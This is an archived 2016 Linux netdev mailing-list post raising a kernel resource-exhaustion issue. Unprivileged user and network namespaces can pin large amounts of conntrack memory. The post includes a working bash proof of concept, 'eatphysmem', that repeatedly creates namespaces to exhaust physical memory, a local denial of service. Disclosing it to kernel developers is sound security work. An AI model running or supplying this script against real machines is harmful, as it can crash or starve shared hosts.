lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date:	Wed, 02 Mar 2016 23:38:11 +0300
From:	yumkam@...il.com (Yuriy M. Kaminskiy)
To:	netdev@...r.kernel.org
Subject: [q] userns, netns, and quick physical memory consumption by unprivileged user

While looking at 759c01142a5d0f364a462346168a56de28a80f52, I remembered about
infamous
    nf_conntrack: falling back to vmalloc
message, that was often triggered by network namespace creation (message
was removed recently, but it changed nothing with underlying problem).

So, how about something like this:

$ cat << EOF >> eatphysmem
#!/bin/bash -xe
fd=6
d="`mktemp -d /tmp/eatmemXXXXXXXXX`"
cd "$d"
rule="iptables -A INPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT"
# rule="$rule;$rule"
# ... just because we can; same with any number of ip ro/ru/etc
while :; do
#for i in {1..1024}; do
    let fd=fd+1
    if [ -e /proc/$$/fd/$fd ]; then continue;fi
    mkfifo f1 f2
    unshare -rn sh -xec "echo foo >f1;ip li se lo up; $rule;read r <f2" &
    pid=$!
    read r <f1
    eval "exec $fd</proc/$pid/ns/net"
    echo bar >f2
    wait
    rm f2 f1
    sleep 1s
done
sleep inf
EOF
$ chmod a+x eatphysmem; unshare -rpf --mount-proc ./eatphysmem
?

You can easily eat 0.5M physical memory per netns (conntrack hash table
(hashsize*sizeof(list_head))) and more, and pin them to single process
with opened netns fds.
What can stop it?
ulimit? What is ulimit? Conntrack knows nothing about them.
Ah-yeah, `ulimit -n`? 64k. 64k*512k = 32G. Per process. Oh-uh.
OOM killer? But this is not this process memory; if any, it will be
killed last.
(I wonder, if memcg can tackle it; probably yes; but how many people
have it configured?).

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ